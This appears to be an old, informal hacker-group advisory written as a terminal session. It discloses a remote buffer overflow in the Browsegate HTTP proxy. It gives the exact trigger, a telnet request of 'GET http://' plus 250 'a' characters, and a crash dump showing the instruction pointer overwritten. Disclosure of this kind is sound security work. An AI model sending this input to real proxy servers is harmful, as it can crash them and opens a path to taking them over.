Username: MDMA Password: Welcome to Hob/OS v1.33.70 Last login: Fri May 1 22:43:35 on ttyp1 dumpster:~# cat MDMA-BG.txt Browsegate Remote Compromise Advisory Released by Wizdumb under MDMA (Moronic Demonic Monkey Asylum) The Browsegate Proxy server is affected by a remote exploitable buffer overflow in the HTTP proxy. Both the @Home and @Work versions are exploitable - personally I didn't see any difference in them at all, but some shmucks pay more for the one, so wtf. ;-) The buffer overflow is triggered like so... [wizdumb@mdma]$ telnet my.mommy.is.goddamn.leet.org 80 Trying 10.0.0.3... Connected to momz.el8.box. Escape character is '^]'. GET http://(250 'a' characters) At which point... BRWGATE caused an invalid page fault in module at 0084:61616161. Registers: EAX=00000001 CS=015f EIP=61616161 EFLGS=00010206 EBX=0072f2ac SS=0167 ESP=0072f270 EBP=61616161 ECX=00502f4c DS=0167 ESI=000082d0 FS=0fbf EDX=e46aff09 ES=0167 EDI=0072f260 GS=0000 Bytes at CS:EIP: Stack dump: 82aa294f 00000167 0072f28c bff942e7 3d5f82d0 00003d5f 00000000 bff719b8 007282ca 0072fe28 bff7186d 82aa294f 00000000 3d5f82aa 0000186d 02460000 The vendor has been informed and a fix will be available soon. Later... Wizdumb .|| wizdumb@mdma.za.net || www.mdma.za.net || wizdumb@#MDMA@blabber.net ||.